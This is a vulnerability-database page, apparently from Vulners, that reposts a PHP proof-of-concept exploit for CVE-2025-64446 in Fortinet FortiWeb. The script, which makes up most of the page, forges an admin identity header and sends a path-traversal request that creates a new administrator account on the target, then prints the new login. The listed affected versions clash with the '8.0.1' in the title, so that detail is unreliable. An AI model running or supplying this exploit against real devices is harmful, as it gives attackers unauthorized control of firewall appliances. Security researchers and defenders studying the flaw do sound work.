Vulners
Lucene search
📄 FortiWeb 8.0.1 Authentication Bypass
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Fortinet Fortiweb | 4 Mar 202608:31 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 26 Mar 202611:29 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 21 Nov 202500:37 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 18 Nov 202510:25 | – | githubexploit |
| Exploit for CVE-2025-58034 | 19 Nov 202509:52 | – | githubexploit |
| Exploit for OS Command Injection in Fortinet Fortiweb | 2 Mar 202614:36 | – | githubexploit |
 | CVE-2025-64446 | 14 Nov 202515:42 | – | circl |
 | Fortinet FortiWeb Path Traversal Vulnerability | 14 Nov 202500:00 | – | cisa_kev |
 | CISA Adds One Known Exploited Vulnerability to Catalog | 14 Nov 202512:00 | – | cisa |
| Fortinet Releases Security Advisory for Relative Path Traversal Vulnerability Affecting FortiWeb Products | 25 Nov 202512:00 | – | cisa |
10
=============================================================================================================================================
| # Title : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.fortinet.com/ |
=============================================================================================================================================
POC :
[+] References : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-64446
https://packetstorm.news/files/id/211729/
https://fortiguard.fortinet.com/psirt/FG-IR-25-071
[+] Summary
A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint.
This vulnerability enables complete compromise of the FortiWeb management interface.
[+] Vulnerability Type: Authentication Bypass via Path Traversal → Unauthorized User Creation
• Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier
• Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8
• Attack Vector: Network
• Authentication: Not Required (Unauthenticated)
• CVSS Score: 9.8 (Critical)
• CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') & CWE-862: Missing Authorization
• CVE: CVE-2025-64446
[+] Technical Description
The vulnerability exists in the FortiWeb API endpoint handling where improper path validation allows attackers to bypass authentication mechanisms. The flaw enables:
1. Path traversal to access privileged CGI endpoints
2. Bypass of API authentication checks
3. Unauthorized creation of administrative users
4. Complete compromise of FortiWeb management
[+] Usage:
Usage: php poc.php fortigate.example.com:8443
[+] POC :
<?php
/**
* CVE-2025-64446 Exploit - FortiWeb Authentication Bypass
* By: indoushka
*/
class FortiWebExploit {
private $colors;
public function __construct() {
$this->colors = [
'RED' => "\033[91m",
'GREEN' => "\033[92m",
'YELLOW' => "\033[93m",
'BLUE' => "\033[94m",
'MAGENTA' => "\033[95m",
'CYAN' => "\033[96m",
'WHITE' => "\033[97m",
'BOLD' => "\033[1m",
'RESET' => "\033[0m"
];
}
private function color($text, $color) {
return $this->colors[$color] . $text . $this->colors['RESET'];
}
private function showBanner() {
$banner = $this->color("
indoushka (*) FortiWeb Authentication Bypass Artifact Generator
", 'MAGENTA') .
$this->color(" CVEs: [CVE-2025-64446]\n", 'RED');
echo $banner . "\n";
}
private function generateUUID() {
return sprintf('%04x%04x', mt_rand(0, 0xffff), mt_rand(0, 0xffff));
}
public function execute($target) {
$this->showBanner();
// Parse target host and port
$parts = explode(':', $target);
if (count($parts) !== 2) {
echo $this->color("[-] Invalid format! Use <host:port>", 'RED') . "\n";
exit(1);
}
$host = $parts[0];
$port = (int)$parts[1];
$user = $this->generateUUID();
$password = $user;
$rawPath = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi";
$cgiinfoJson = [
"username" => "admin",
"profname" => "prof_admin",
"vdom" => "root",
"loginname" => "admin"
];
$cgiinfoB64 = base64_encode(json_encode($cgiinfoJson));
$headers = [
"CGIINFO: " . $cgiinfoB64,
"Content-Type: application/x-www-form-urlencoded",
];
$body = [
"data" => [
"q_type" => 1,
"name" => $user,
"access-profile" => "prof_admin",
"access-profile_val" => "0",
"trusthostv4" => "0.0.0.0/0",
"trusthostv6" => "::/0",
"last-name" => "",
"first-name" => "",
"email-address" => "",
"phone-number" => "",
"mobile-number" => "",
"hidden" => 0,
"comments" => "",
"sz_dashboard" => -1,
"type" => "local-user",
"type_val" => "0",
"admin-usergrp_val" => "0",
"wildcard_val" => "0",
"accprofile-override_val" => "0",
"sshkey" => "",
"passwd-set-time" => 0,
"history-password-pos" => 0,
"history-password0" => "",
"history-password1" => "",
"history-password2" => "",
"history-password3" => "",
"history-password4" => "",
"history-password5" => "",
"history-password6" => "",
"history-password7" => "",
"history-password8" => "",
"history-password9" => "",
"force-password-change" => "disable",
"force-password-change_val" => "0",
"password" => $password
]
];
$bodyData = json_encode($body);
echo $this->color("[~] Sending exploit payload to $host:$port ...", 'BLUE') . "\n";
// Create SSL context to disable verification
$context = stream_context_create([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true
],
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers) . "\r\n",
'content' => $bodyData,
'ignore_errors' => true
]
]);
$url = "https://$host:$port$rawPath";
// Send the request
$response = @file_get_contents($url, false, $context);
if ($response === false) {
echo $this->color("[✗] Exploit failed - Could not connect to target", 'RED') . "\n";
exit(1);
}
// Get HTTP status code from response headers
$statusCode = 0;
if (isset($http_response_header[0])) {
preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $matches);
$statusCode = isset($matches[1]) ? (int)$matches[1] : 0;
}
// Process result
if ($statusCode === 200) {
echo $this->color("[✓] Exploit sent successfully!", 'GREEN') . "\n";
echo $this->color("[*] New user created → ", 'YELLOW') . $this->color($user, 'GREEN') . "\n";
echo $this->color("[*] Password → ", 'YELLOW') . $this->color($password, 'GREEN') . "\n";
} else {
echo $this->color("[✗] Exploit failed — Status Code: $statusCode", 'RED') . "\n";
// Debug information
if (!empty($http_response_header)) {
echo $this->color("[*] Response headers:", 'YELLOW') . "\n";
foreach ($http_response_header as $header) {
echo " $header\n";
}
}
if (!empty($response)) {
echo $this->color("[*] Response body:", 'YELLOW') . "\n";
echo substr($response, 0, 500) . "\n";
}
}
}
}
// Main execution
if (php_sapi_name() === 'cli') {
if ($argc !== 2) {
echo "Usage: php cve-2025-64446.php <target_fortiweb_ip:port>\n";
echo "Example: php cve-2025-64446.php 192.168.1.1:443\n";
exit(1);
}
$exploit = new FortiWebExploit();
$exploit->execute($argv[1]);
} else {
echo "This script is intended for command line use only.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.9299
SSVC